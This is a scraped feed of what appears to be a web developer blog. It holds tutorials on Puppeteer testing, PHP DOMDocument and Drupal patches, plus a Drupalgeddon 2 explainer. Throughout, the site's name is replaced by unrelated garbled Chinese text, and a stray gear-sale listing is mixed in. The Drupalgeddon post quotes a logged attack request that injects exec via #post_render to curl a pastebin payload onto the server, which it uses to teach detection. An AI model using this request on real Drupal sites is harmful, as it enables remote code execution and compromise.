Puppeteer allows you to do anything you would do manually in Chrome but through code. Need a screenshot? Want to test form inputs? Need to test your web speed? Puppeteer can do all that and more.
The post Testing with Puppeteer – Part 1 appeared first on 国产吃瓜黑料 Online.
]]>In a previous post on the 国产吃瓜黑料 Developer Blog, we talked about our development workflow and how it includes a testing process. Over the past couple of months, we鈥檝e been experimenting with making our testing process more efficient and helpful for our developers. In our research, we came across a tool from Google called , “a high level API to control Chrome or Chromium over the DevTools Protocol.” In more basic terms, Puppeteer allows you to do anything you would do manually in Chrome but through code. Need a screenshot? Want to test form inputs? Need to test your web speed? Puppeteer can do all that and more.
Our tests used to be built using a tool called that ran on top of a headless browser. Our experience with Casper has unfortunately been troublesome with tests failing for no apparent reason and inconsistencies across runs. Our tests were becoming so finicky and troublesome that we started commenting out tests that we knew were succeeding in the browser but failed for Casper. We still needed our builds but Casper was not being a reliable source of information for passing and failing tests. This was obviously not a good sign, bad practice, and would lead to trouble down the line.
After experimenting and researching Puppeteer, we arrived at two questions:
Should we change our tests from Casper to Puppeteer?
Would Puppeteer be better and thus worth the switch?
As a team we decided it would at least be worth implementing one of our tests in Puppeteer and viewing the results.
For our test, we decided that Puppeteer would be the headless browser instance and then and would help us with assertions. Mocha and Chai are Javascript libraries to help tests determine whether an assertion passes or not. For example, we assert that the homepage has the title “国产吃瓜黑料” on it. Mocha runs the test and Chai checks the result versus the expectation and returns true or false. Each test instantiates a headless Chrome instance using Puppeteer and uses Mocha and Chai to run the assertions.
Getting started with Puppeteer, Mocha, and Chai proved to be extremely straightforward and easy to follow. We were able to convert a previously failing Casper test to a working Puppeteer test within a few hours. After we were able to get one test suite running, we worked on converting all of our test to Puppeteer and removing Casper from our process. In this shift, we were able to provide developers with more tools to help debug tests that are failing. Puppeteer has the option to run Chrome in a non-headless state, so a browser window would open up with the test parameters and allow a developer to interact with the test. We also were able to implement a screenshot workflow that takes screenshots of the webpages for any failing test. Both of these options are simple parameters passed to the testing script. Our experience so far has been happy and successful and we look forward to diving deeper into Puppeteer.
Be sure to check out Part 2 to learn how we implemented Puppeteer, Mocha, and Chai to create our new test suite.
The post Testing with Puppeteer – Part 1 appeared first on 国产吃瓜黑料 Online.
]]>At the end of this tutorial, we will have a fully working test that implements Puppeteer, Mocha, and Chai for 国产吃瓜黑料 Online.
The post Creating Tests with Puppeteer: Part 2 appeared first on 国产吃瓜黑料 Online.
]]>In our last听post about implementing tests with Puppeteer, we did a high-level overview of some of the decisions we made to switch from Casper to Puppeteer. In this post, we are going to go over the code that makes our tests work.
At the end of this tutorial, we will have a fully working test that implements , , and for 国产吃瓜黑料 Online.
Let鈥檚 first start with creating a new folder in the directory of your choosing.
Inside this folder, run npm init
– feel free to name it however you like and fill in any values you prefer, there is nothing special in this step
Next, we need to install 4 modules. Two of them are devDependencies
and two are regular dependencies
npm install --save lodash puppeteer
npm install --save-dev mocha chai
I did not mention lodash in the previous post, but it is a utility library that we will use minimally.
After installation completes, create an empty bootstrap.js
file to bootstrap our tests in the base directory.
Lastly for initialization, we need to modify package.json
to run mocha correctly:
...
"scripts": {
"test": "mocha bootstrap.js";
}
...
In your terminal, if you run npm test
you should get an output saying 0 passing
. This is exactly what we want – it signals everything is correctly installed and mocha is running.
The next thing we need to do is bootstrap all of our tests with puppeteer
.
Head back to your text editor and open up the bootstrap.js
file.
We now need to import the libraries we installed:
const puppeteer = require('puppeteer');
const { expect } = require('chai');
const _ = require('lodash');
One of the benefits of using mocha
is that we can define before
and after
functions that will run before our test suite and then after. This is ideal for setup and cleanup after our tests run.
We are going to create a before
function to setup puppeteer
before (async function () {
global.expect = expect;
global.browser = await puppeteer.launch({headless: true});
});
The before
function does 2 things – it setups expect
as a global variable to use in all of our tests and it also creates a puppeteer browser
instance that we can reuse. We do this so we are not creating a new browser for each test, just using a single one.
Inside of launch()
for puppeteer
we are passing in the option of headless: true
. This flag is what determines how Chrome will launch – a physical browser or not. For now, we are setting it to be headless
but, if you wanted to see an actual Chrome browser open up and run you would set it to false.
Now for our after
function, we are just going to do a little cleanup:
after (function () {
browser.close();
});
All that is doing is closing down the puppeteer browser
instance we created.
With all the setup work now complete, we can create our first test! For this test, we are going to keep it really simple and make sure that 国产吃瓜黑料's homepage has the correct title.
Before we get started, check out the for some examples and documentation of how to write tests.
Next, go ahead and create a directory within your project called test
Inside the test
directory, create a new file called homepage.spec.js
– this will be the file where we write our homepage tests.
To start our test inside homepage.spec.js
we have to describe it
–
describe('Homepage Test', function() {
});
In the previous section we set up the base bootstrap for all tests. Now, we need to set up a before function that handles what should happen before
the tests are run. In this scenario it needs to:
Open a new tab
Go to a specific URL
Within the describe
function, let's create the before
initialization:
before (async () => {
page = await browser.newPage();
await page.goto('', { waitUntil: 'networkidle2' });
});
With the before
successfully created, we can now write our test right below the before
function!
it("should have the title", async () => {
expect(await page.title()).to.eql("国产吃瓜黑料 Online")
});
The above test should read almost like a sentence – we “expect” the page title to equal 国产吃瓜黑料 Online. Pretty simple, right?
With our test complete, we just need to do one more thing – update our package.json
script.
...
"scripts": {
"test": "mocha bootstrap.js --recursive test/ --timeout 30000"
}
...
听
We added two more parameters to the test script:
The --recursive test/
parameter tells mocha
to look into the test/
folder and recursively run all tests that it finds. For us it is only 1, but you can imagine a folder full or subfolder and subtests that all need to be run.
The --timeout 30000
is setting the mocha
timeout to be 30 seconds instead of 2000ms. This is important as it takes some time for puppeteer
to launch and, if we didn't have that, the tests would fail to launch!
With that now complete, we can run our tests with a simple npm test
We should now see that the test has run correctly and the 国产吃瓜黑料 homepage has the title “国产吃瓜黑料 Online”.
If you want to double check to make sure it is working, go back to homepage.spec.jsand change the title to expect something else like “Welcome to 国产吃瓜黑料!”
it("should have the title", async () => {
expect(await page.title()).to.eql("Welcome to 国产吃瓜黑料")
});
If we do that, and rerun the tests, we should see that it has failed. Congratulations you are up and running!
If you鈥檝e run into any errors or problems, visit the gist to compare your code. Be sure to check out Part 3 of this series of how to pass custom parameters to your tests and generate screenshots for failing tests!
The post Creating Tests with Puppeteer: Part 2 appeared first on 国产吃瓜黑料 Online.
]]>Today, we are going to work on customizing tests by passing in custom parameters.
The post Customizing Puppeteer Tests: Part 3 appeared first on 国产吃瓜黑料 Online.
]]>In our previous two听 posts, we talked about why we switched to Puppeteer and how to get started running tests. Today, we are going to work on customizing tests by passing in custom parameters.
We need to be able to pass in custom parameters for debugging and local testing. Our tests currently run through Travis CI, but if a developer needs to run the tests locally, the options are not exactly the same.
The URL for the test will be different
The developer usually needs to debug the tests to determine why they failed
We implemented three custom parameters to help with this problem:
Ability to pass in a custom URL
Ability to run Chrome in a non-headless state
Ability to have screenshots taken of failing tests
We are going to go through all of these custom parameters and learn how to implement them.
At 国产吃瓜黑料, we run our tests on a development Tugboat Environment and our local machines. The two base URLS for these environments differ but the paths to specific pages do not. For example, our local machines point to http://outside.test
while our Tugboat environments are unique for each build.
We are going to pass a parameter that looks like this: --url={URL}
. For our local site, the full command ends up being npm test -- --url=http://outside.test.
Let's get started in setting this up.
We need to set up a variable that will be accessible across all files that contains the base URL. In bootstrap.js
inside the before function, we are going to name the variable baseURL
:
before (async function () {
...
global.baseURL = '';
...
});
Now we need to access the variables that are passed into the before s function from the command line. In Javascript, these arguments are stored in process.argv
. If we console.log
them real quick, we can see all that we have access to:
global.baseURL = '';
console.log(process.argv);
Head back to your terminal and run npm test -- --url=
. You should see an array of values printed:
[ '/usr/local/Cellar/node/10.5.0_1/bin/node',
'bootstrap.js',
'--recursive',
'test/',
'--timeout',
'30000',
'--url=' ]
From the above array, we can see that our custom parameter is the last element. But don't let that fool you! We cannot guarantee that the URL will be the last parameter in this array (remember, we have 2 more custom parameters to create). So we need a way to loop through this list and retrieve the URL:
Inside before
in bootstrap.js
we are going to loop through all the parameters and find the one we need by the url
key:
for (var i = 0; i < process.argv.length; i++) {
var arg = process.argv[i];
if (arg.includes('--url')) {
// This is the url argument
}
}
In the above loop, we set arg
to be the current iteration value and then check if that string includes url
in it. Simple enough, right?
Now we need to set the global.baseURL
to be the url passed in through the npm test
command. However, we need to make note that the url argument right now is the whole string --url=www.outsideonline.com
. Thus, we need to modify our code to retrieve only www.outsideonline.com. To retrieve only the url, we are going to split the string at the equal sign using the Javascript function split
. split
works by creating an array of the values before and after the defined string to split at. In our case, splitting --url=www.outsideonline.com
with arg.split("=")
will return ['--url', 'www.outsideonline.com']
. We can then assume the URL will be at the first index of the split array.
if (arg.includes('url')) {
// This is the url argument
global.baseURL = arg.split("=")[1];
}
Now that we have our URL, we need to update our tests to use it.
Open up homepage.spec.js
and we are going to edit the before
function in here:
before (async () => {
page = await browser.newPage();
await page.goto(baseURL + '/', { waitUntil: 'networkidle2' });
});
We are also going to keep our test from the previous post on Puppeteer:
it("should have the title", async () => {
expect(await page.title()).to.eql("国产吃瓜黑料 Online")
});
Now, if you run the tests with the url added it should work as it previously did! npm test -- --url=
Let's create another test to show the value of passing the url through a custom parameter. Inside the test
folder, create a file called contact.spec.js
. We are going to test the "Contact Us" page found here: /contact-us
In this test, we are going to make sure the page has the title "Contact Us" using a very similar method:
describe('Contact Page Test', function() {
before (async () => {
page = await browser.newPage();
await page.goto(baseURL + '/contact-us', { waitUntil: 'networkidle2' });
});
it("should have the title", async () => {
expect(await page.title()).to.eql("Contact Us | 国产吃瓜黑料 Online")
});
});
As you can see above, using the baseURL
, it is very easy to change the page you want to test based on the path. If for some reason we needed to test in our local environment, we only have to change the --url
parameter to the correct base URL!
Having the ability to visually see the Chrome browser instance that tests are running in helps developers quickly debug any problems. Luckily for us, this is an easy flag we just need to switch between true
and false
.
The parameter we are going to pass in is --head
to indicate that we want to see the browser (instead of passing in --headless
which should be the default).
Our npm test script will now look something like this:
npm test -- --url= --head
听
Inside of before
in bootstrap.js
, we need to update that for
loop we created before to also check for the head
parameter:
global.headlessMode = true;
for (var i = 0; i < process.argv.length; i++) {
var arg = process.argv[i];
if (arg.includes('url')) {
// This is the url argument
global.baseURL = arg.split("=")[1];
}
if (arg.includes("--head")) {
global.headlessMode = false;
// Turn off headless mode.
}
}
In this instance, we only need to check if the parameter exists to switch a flag! We are using the parameter headlessMode
to determine what gets passed into the puppeteerlaunch
command:
global.browser = await puppeteer.launch({headless: global.headlessMode});
Lastly, if we are debugging the browser we probably do not want the browser to close after the tests are finished, we want to see what it looks like. So inside the after
function in bootstrap.js
we just need to create a simple if statement:
if (global.headlessMode) {
browser.close();
}
And that's it! Go ahead and run npm test -- --url= --head
and you should see the tests in a browser!
Our last custom parameter is to help us view screenshots of failing tests. Screenshots can be an important part of the workflow to help quickly debug errors or capture the state of a test. This is going to look very similar to the head
parameter, we are going to pass a --screenshot
parameter.
Let's again update before
in bootstrap.js
to take in this new parameter:
if (arg.includes("screenshot")) {
// Set to debug mode.
global.screenshot = true;
}
Next up, we are going to implement another mocha
function - afterEach
. afterEach
runs after each test and inside the function, we can access specific parameters about the test. Mainly, we are going to check and see if a test failed or passed. If it failed, we then know we need a screenshot. The afterEach
function can go in bootstrap.js
because all tests we create will be using this:
afterEach (function() {
if (global.screenshot && this.currentTest.state === 'failed') {
global.testFailed = true;
}
});
After a test has failed, we now has a global testFailed
flag to trigger a screenshot in that specific test. Note - bootstrap.js
does not have all the information for a test, just the base. We need to let the individual test files know if we need a screenshot of a failed test so we get a picture of the right page.
Head back to homepage.spec.js
and we are going to implement and after
function.
after (async () => {
if (global.testFailed) {
await page.screenshot({
path: "homepage_failed.png",
fullPage: true
});
global.testFailed = false;
await page.close();
process.exit(1);
} else {
await page.close();
}
});
The above function checks if the test has failed based on the testFailed
flag. If the test failed, we take a full page screenshot, reset the flag, close the page, and exit the process.
Unfortunately, the above code works best inside each test file so there will be some code duplication across tests. The path
setting makes sure that no screenshot overrides another tests screenshot by setting the filename to be the one of the test. The screenshot will be saved in the base directory where we run the npm test
command from.
To test and make sure this works, let's edit homepage.spec.js
to expect a different title - like "国产吃瓜黑料 Magazine"
it("should have the title", async () => {
expect(await page.title()).to.eql("国产吃瓜黑料 Magazine")
});
We know this one will fail, so when we run npm test -- --url=https://cdn.outsideonline.com --screenshot
we should get a generated screenshot! Look for a file named homepage_failed.png
.
Add custom parameters to your npm
script is fairly simple once you get the hang of it. From there, you can easily customize your tests based on these parameters. Even with the custom parameters we have created, there is room for improvement. Stricter checking of the parameters would be a good first step to rule out any unintended use cases. With the custom url, headless mode, and screenshots, our tests are now easier to manage and debug if something ever fails. Check out the , , and to learn more!
The post Customizing Puppeteer Tests: Part 3 appeared first on 国产吃瓜黑料 Online.
]]>This past March and April, the Drupal Security Team announced two highly critical security patches: 鈥淒rupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002鈥� and "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004".
The post Drupalgeddon 2 – What & Why appeared first on 国产吃瓜黑料 Online.
]]>This past March and April, the Drupal Security Team announced two highly critical security patches: 鈥溾€� and ““. First off, before I go any further, if you operate a Drupal site and have not applied these patches already, please patch your site right now. Unfortunately (and not to get too pessimistic), if your site has some traffic and the patch has not been applied, your site is most likely already hacked. If your site was exploited, please visit immediately.
If we take a dive into the patch file provided by the Drupal Security Team, we can see two files were edited:
includes/bootstrap.inc
includes/request-sanitizer.inc
In these files, a new line was added to bootstrap.inc which calls a new function within request-sanitizer. Two new functions were added to request-sanitizer:
sanitize
stripDangerousValues
Looking at the flow, the sanitize()
function is added to bootstrap.inc
to check the parameters being passed through. For those parameters, it will remove “dangerous values” from the parameters, thus the name. If you check out the code for Drupal 7.x , you can see that the security patch is fairly small. Don't let the amount of code fool you though, the implications are massive.
For all version 6, 7, and 8 of Drupal there was a vulnerability with sending data through the Form API – if there exists a property key with a hash sign听#
, the data associated with it would pass through. Why is this an issue? Well if you think about how developers use some of the APIs in Drupal, many of them contain #signs in them. Take one look at the , and you can see many, many properties marked with a # – #prefix, #markup, #post_render, #pre_render, #type
, etc. This means that a hacker could in theory create a GET or POST request to certain URLs, passing in whatever data they wanted. Scary.
SA-CORE-2018-004 piggybacks on the first security patch but has a little different user case. If you look at the security list you will see “20鈭�25 AC:Basic/A:User/CI:All/II:All/E:Exploit/TD:Default.” The “A:User” comes from and means that it applies for “user-level access.” What does that mean? It means that there must be some level of permission for issue to be exploited. While that may be some relief, it is still highly critical. If a hacker successfully exploited the first security issue, then they would easily be able to maneuver past this. Looking at the patch, we can see 4 impacted files:
bootstrap.inc
common.inc
request-sanitizer.inc
file.module
The main takeaway from this patch is the cleanDestination() function added to request-sanitizer.inc (which was added in the first security patch). The purpose of cleanDestination
is to “remove the destination if it is dangerous” per code comments. This function uses the previously built stripDangerousValues and determines if the destination is “dangerous.” If it is, it will unset the destination from the request and trigger an error: “Potentially unsafe destination removed from query string parameters (GET) because it contained the following keys: @keys.” This adds another layer of security to requests sent to Drupal alongside the stripDangerousValues.
The question you may be asking yourself now is “will this happen to me?” Yes. Yes, it will.
Back in March, I was the one who had the opportunity to apply the fix to Drupal Core. A fairly simple process that took all of 5 minutes. So, in thinking about the security patch almost a month later, I decided to do some digging into our logs to see if anyone had actually attempted to use this exploitation on our site. I used references from the , a site that “gathers millions of intrusion detection log entries every day”, to pinpoint exactly what to look for. In their article ““, hackers can be seen trying to manipulate different API calls with the # sign.
As it so happens, 国产吃瓜黑料 Online was targeted in the past two weeks with this exploit.
134.196.51.197 - - [19/Apr/2018:07:24:26 +0000] "POST /category/indefinitelywild/?q=user/password&name[%23post_render][]=exec&name[%23markup]=curl+-o+misc%2fserver.php+https%3a%2f%2fpastebin.com%2fraw%2fhhWU03ih&name[%23type]=markup HTTP/1.1" 200 10326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0"
Looking at that request from our logs above, it already looks very suspicious. There shouldn't be any POST requests going to a category page, especially not a user POST request. Let's clean it up a little:
POST /category/indefinitelywild/?q=user/password&name[#post_render][]=exec&name[#markup]=curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih&name[#type]=markup
Immediately there are some suspicious aspects to this request. First off, exec
is a PHP function used to immediately execute code. Secondly, the code is sending a curl
request to a pastebin URL which sounds dangerous. Basically, the hacker was trying to execute whatever functionality was in their pastebin. When the post_render function fired, it would call exec
on curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih
which would download whatever is in the pastebin and run it. Scary scary scary. Note, I went to the pastebin URL, it has been removed.
For the second security patch, we stayed diligent, patched our site as soon as possible, and thankfully didn't see any problems. Fortunately we have the resources to do that because the second security patch had known exploits in the wild hours after it was released.
Exploitations for this issue are most commonly pointed at anything dealing with user. Why? There is one common form in Drupal sites that hackers can assume – user login, user registration, user password reset, etc. All Drupal sites have users associated with them otherwise they would be static websites. Thus, hackers use this common denominator on all sites instead of trying to search page by page to find a form.
Another thing to look for is any passing of exec in a URL – this is a request trying to execute code. Lastly, in these requests, the only possible targets are parameters with the # sign.
If you suspect that your site has been hacked, here are a couple signs and methods that have been shared online:
The most obvious, but also still-used way is to replace the homepage. Some hackers replace the homepage announcing the hack and a link to their profile to “pay” them.
New users added to your site that you don't recognize.
If you have access to the code repository with source control like git, if you run git status and notice new php file, changes to js files, etc. that you know were not part of your code changes, then hackers most likely were able to access them.
Another sneaky attack is by injecting tags into the body field of Drupal content types. You may think doing a reset of your code base would fix it, but those entities live in the database so they will be executed until the data is sanitized.
Hackers also inject cryptomining software into a plethora of sites. One would notice this by checking the server usage as there may be a spike. This is often using the that has been around for a couple years.
If you have been hacked, those would be the most likely places to start your search. Again, please visit immediately as the Drupal Security Team has outlined steps to help you get your site back up and running.
Here are some more resources in learning more about Drupalgeddon2:
- ArsTechnica
- Check Point Research
- ISC
- Bleeping Computer
- Bleeping Computer
- Threat Post
- Threat Post
The post Drupalgeddon 2 – What & Why appeared first on 国产吃瓜黑料 Online.
]]>The DOMDocument is a class built in to PHP that helps developers navigate an HTML document tree and provides methods to help interact with the document.
The post HTML Parsing with the DOMDocument appeared first on 国产吃瓜黑料 Online.
]]>Recently our development team needed to find a way to manipulate the body of an article and return JSON objects of all the body content. This was because of the constraints of the Apple News Publishing Format, which 国产吃瓜黑料 recently joined. We needed to separate almost all HTML elements into their own individual component/object. As you can imagine, trying to write custom code to parse the body would鈥檝e taken a long time and would鈥檝e never captured all the permutations. After doing some research, we learned we were able to use to manipulate our body HTML content to solve the separation-of-HTML-elements problem.
The DOMDocument is a class built in to PHP that helps developers navigate an HTML document tree and provides methods to help interact with the document. If you ever need to parse HTML content or manipulate HTML content using PHP, DOMDocument can help you quickly and easily access nodes.
At 国产吃瓜黑料, one thing we pride ourselves on is finding and sharing the best gear available. Today, we鈥檙e going to take a gear article and do a simple count of how many links are inside the body. DOMDocument is fairly easy to set up, and from there, you can manipulate it to your specific scenario.
View the article here: Upgrade Your Gear Closet with These 10 Great Deals
Here is a copy of the HTML content for your own testing purposes
Initialize the DOMDocument()
$dom = new DOMDocument();
Load our HTML into the $dom object.
$dom->loadHTML($body);听
1. With our HTML now loaded into the DOMDocument() object, we can use the method getElementsByTagName() which exists in the DOMDocument class, to get all elements with a link.
$links = $dom->getElementsByTagName('a');
2. For this specific example, all we need to do is get the number of links. 听The method getElementsByTagName() returns a DOMNodeList, so we use the length method on DOMNodeList to get the number of links.
$body = HTML_CODE_HERE;
$dom = new DOMDocument();
$dom->loadHTML($body);
$links = $dom->getElementsByTagName('a');
$num_links = $links->length;
print($num_links); // 21
3. If you take a look at the article and the HTML, you will see that we have 2 types of links. We have regular links within text but we also have links with a class of btn. The btn links have a button style to them.
4. Next, we鈥檙e going to loop through all of the links so we can iterate on each one. Simple enough:
foreach ($links as $link) {
}
5. There then exists a method getAttribute() on DOMDocument to get the class attribute:
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
}
6. Our next step is to check if the class of btn exists on the link.
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
if (strpos('btn', $link_class) !== FALSE) {
$num_btns++;
}
}
7. The above code looks correct, but if you look at the HTML, you鈥檒l notice that some links don't contain a class on them. PHP will throw a WARNING because of this. Let's fix that.
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
if (!empty($link_class) && strpos('btn', $link_class) !== FALSE) {
$num_btns++;
}
}
8. The last thing we haven't done is initialize $num_btns:
$num_btns = 0;
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
if (!empty($link_class) && strpos('btn', $link_class) !== FALSE) {
$num_btns++;
}
}
print($num_btns); // 10
9. Great work! As you can see, manipulating HTML can be fairly easy with DOMDocument.
10. DOMDocument can be used for more than document traversal. You can also create new elements and append them to the current HTML.
11. Let's say we want to add a link to the bottom of this page that points to all of our gear articles. We can create a link element using the createElement method!
$gear = $dom->createElement('a', "Check out our Gear Channel");
$gear->setAttribute('href', "/outdoor-gear");
12. After we've created our element, all we need to do now is add it to the $dom. The createElement function creates a new instance of the DOMElement, in this case a link, but it will not show up in the document unless it is properly inserted. In that case, we must use the 听appendChild() function to get it to appear. See the for reference.
$dom->appendChild($gear);
13. Here is the full code for adding a link to our HTML:
$gear = $dom->createElement('a', "Check out our Gear Channel");
$gear->setAttribute('href', '/outdoor-gear');
$dom->appendChild($gear);
print($dom->textContent);听
PHP's DOMDocument() class makes it very easy for developers to traverse and manipulate any HTML content. There exist many other methods in the class that can prove useful to you: getEelemntsByTagName, createAttribute, createTextNode, and createCDATASection just to name a few. No need to any extra libraries or modules, it's all built right in!
To learn more, visit the .
听
Moosejaw's Almost Everything sale starts Tuesday and goes until April 8. Most products are at least 25 percent off, or you can use the code YAY20 to get 20 percent off a full-price item. Here are a few sale highlights our editors have their eyes on.
Patagonia Women's Nano Puff Hoody ($175; 30 percent off)
Although it packs down to the size of an orange, the has kept our testers warm when temps drop to the 30s. Filled with high-loft synthetic insulation, the ripstop face fabric is treated with DWR to repel water.
Arcteryx Mens Covert Cardigan ($134; 25 percent off)
Perfect for the office or the crag, the merino wool is style-oriented but with technical chops. Stash your credit card or chapstick in the zipper arm pocket.
Gregory Men's Baltoro Backpack ($191; 40 percent off)
One of our favorite backpacking packs year in and year out, the 75-liter has the all the space you need to carry gear for a week in the backcountry. Plus, the removable internal hydration sleeve transforms into a daypack for summit bids.
CamelBak Franconia LR 24 Hydration Pack ($120; 25 percent off)
With plenty of room for extra layers, a first aid kit, and lunch, also features a lumbar style hydration pack which helps center the weight on the hip and prevents water sloshing.
Hydro Flask 32 Ounce Wide Mouth Bottle ($34; 15 percent off)
Don't settle for warm water or cold coffee, invest in an insulated bottle and never look back. The extra-wide mouth of allows for easy filling and cleaning.
MSR Hubba Hubba NX 2-Person Tent ($300; 25 percent off)
One of the most iconic tents ever made, the Hubba Hubba was redesigned in 2014 to make the yet. The designers also included color-coded stakeouts for easy setup.
Therm-a-Rest Neoair Dream Sleeping Pad ($152; 44 percent off)
This may just be the ultimate sleeping pad. 's unique design combines an air mattress and a foam topper. It's hands down the most comfortable pad we've ever slept on.
Helinox Chair One Camp Chair ($75; 25 percent off)
Weighing just 1.6 pounds, can hold up to 320 pounds. The secret is a pairing of strong but light aluminum poles and tough 600 denier polyester fabric which creates a package that packs to the size of a Nalgene.
Osprey Women's Ariel AG 65 Backpack ($248; 20 percent off)
Set yourself up for a summer full of adventures with the . It features women's specific touches, like extra padded S-shaped shoulder straps and a wide hip belt.
Yeti Roadie 20 Cooler ($160; 20 percent off)
Designed for life on the move, the 20-liter has a sturdy aluminum handle for easy transport. It has room for 16 cans inside, plus ice.
听
The post HTML Parsing with the DOMDocument appeared first on 国产吃瓜黑料 Online.
]]>A patch is a specific file that outlines all the changes made between two sets of files.
The post Getting Started with Patches appeared first on 国产吃瓜黑料 Online.
]]>This past month at 国产吃瓜黑料, we went through the process of updating all of our environments from PHP 5.6 to PHP 7.1. This process was not an easy one and took some careful testing, inspection, and review to make sure that we didn't miss any code changes between the versions.
Along the way, we encountered an issue with the module, where the summary was not displaying after a successful upload. This issue was actually logged by another user back in September 2016 with the title . The reporter graciously provided a solution (array syntax change) to create a patch, but, in the process, instead of creating an actual patch
file, the reporter uploaded the diff
instead.
As the newest member of the team, I had actually never created or applied patches to any Drupal project, so the process became a learning experience for me and one that I wanted to share with you.
A patch is a specific file that outlines all the changes made between two sets of files. For example, if I have file and I make some changes to it, I would create a patch file that showcases the differences that I have implemented, and then I would submit it so other developers can review and/or implement it. This way, when developers are contributing to Drupal core or contributed modules, they can easily submit patches for any fixes without sending over a completely new file.
A patch file looks very similar to when you run git diff
on a file. It outlines all the added lines (+
) and all the lines removed (-
) in that specific file. Patches usually start out as diff
files and then move to a patch
file. Below is the output of a git diff for a file and we can see the added lines (+
) and removed (-
).
diff --git a/test_module.module b/test_module.module
index 17b9c77..9dc0261 100644
--- a/test_module.module
+++ b/test_module.module
@@ -13,7 +13,8 @@ function test_module_menu() {
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
- 听听听'title' => 'Test Module Settings',
+ 听听听'title' => 'Test Module Admin Settings',
+ 听听听'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),听
When creating a patch file, there are two things to note before submitting it:
Make sure you are in the git
repository for that one module. If you are creating a patch for a contrib module, download that contrib module from and apply it there, not your project specific repository.
The diff
file is not what you upload to ; make sure you have a .patch
file.
Let's get started! If you would like to follow along with a code sample, .
Inside of our test_module
, we are going to create a simple patch to change the title of menu item and add a description. Go ahead and open up test_module.module
in your favorite text editor.
Inside of test_module_menu()
update the 'title'
to be "Test Module Admin Settings"
Next update, add a 'description'
to the menu item with the text 'Configure the test module'
After following those steps, the test_module_menu()
function should look like this:
/**
* Implements hook_menu().
*/
function test_module_menu() {
$items = array();
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
'title' => 'Test Module Admin Settings',
'description' => 'Configure the test module',
听 'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
);
return $items;
}
Now that we have successfully updated our module, it is time to create the patch!
Open up the terminal and move into the module folder.
Inside the module folder in your terminal, go ahead and run git diff
. You should see something very similar to this:
diff --git a/test_module.module b/test_module.module
index 17b9c77..9dc0261 100644
--- a/test_module.module
+++ b/test_module.module
@@ -13,7 +13,8 @@ function test_module_menu() {
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
- 听听听'title' => 'Test Module Settings',
+ 听听听'title' => 'Test Module Admin Settings',
+ 听听听'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
With the above output, we can now create a patch by running git diff > test_module_patch.patch
This will create a file, test_module_patch.patch
that has all of the outputs of the git diff
command in it, but as a patch file!
Success! You've officially created your first patch.
Now we want to test to make sure our patch works correctly. If you run git status
from the command line, you should see something similar to this:
On branch master
Changes not staged for commit:
(use "git add ..." to update what will be committed)
(use "git checkout -- ..." to discard changes in working directory)
modified: 听听test_module.module
Untracked files:
(use "git add ..." to include in what will be committed)
test_module_patch.patch
no changes added to commit (use "git add" and/or "git commit -a")
听
To test, we will undo the changes we made to test_module.module
, apple the patch, and make sure the patch changes are applied to test_module.module
. Run git checkout -- test_module.module
. The module file will now be back to the original state before we made the changes. If we view the file test_module.module
, you will see the that test_module_menu()
function looks like it did originally:
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
听 'title' => 'Test Module Settings',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
);
Next up, we can run git apply test_module_patch.patch
. This will apply the patch to the files specified in the patch. So for us, it will apply the changes we made to test_module.module
If we open test_module.module again
, we can see the patch applied!
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
'title' => 'Test Module Admin Settings',
'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
);听
That is all there is to it! Remember to make sure that you are creating a patch in the module specific git
directory. You do not want any path specific files showing up in the patch
file.
If you were contributing to a module on , there are a few other rules:
Make sure there鈥檚 an issue related to the patch you are creating.
Name your patch file appropriately – test_module_path
is a bad name for contributed modules. The best way to do it is with the Issue Number and then a descriptive title. For example: bulk-media-upload-previous-upload-summary-php-7-2800897-12.patch
. Look to follow the of [project_name]-[short-description]-[issue-number]-[comment-number].patch
Make sure your patch follows all Drupal Coding Standards.
Make sure you follow all rules outlined by the module's coding standards.
Congratulations on making a patch! Now you can contribute back to Drupal and all of the contributed modules.
The post Getting Started with Patches appeared first on 国产吃瓜黑料 Online.
]]>We want to share with the development community some of what we have learned while building 国产吃瓜黑料 Online.
The post Welcome to the 国产吃瓜黑料 Developer Blog appeared first on 国产吃瓜黑料 Online.
]]>How is this site built? What tools help our developers? What are some of the best practices? What have we learned?
The questions above are some of the reasons why we are starting this developer column. We want to share with the community and the world some of what we have learned while building 国产吃瓜黑料 Online so that, if the time ever comes for you to build your own site, you have the resources to succeed. As developers, we run into problems and challenges every day – from optimizing our page load to deliver the fastest possible experience to crafting beautiful designs that work on all devices. In the course of solving these problems, we often learn new skills, new API calls, new functionality, and new ways to work smarter, better, and more efficiently.
国产吃瓜黑料 Online is built off of听, an open source content management system, where we have extended Drupal with custom modules, themes, and designs. Our site has been upgraded and enhanced to provided an extremely fast load time, designs optimized for all devices, and many more features so that the experience you have on 国产吃瓜黑料 Online is the best possible version.
Stay tuned for more posts about developing at 国产吃瓜黑料 Online, from tutorials to informational rundowns. We hope this is a resource for you as you work on your own projects.
The post Welcome to the 国产吃瓜黑料 Developer Blog appeared first on 国产吃瓜黑料 Online.
]]>The build tools and systems we use at 国产吃瓜黑料 to manage our code, our development, and most importantly, our deployment
The post Code Management and Deployment at 国产吃瓜黑料 appeared first on 国产吃瓜黑料 Online.
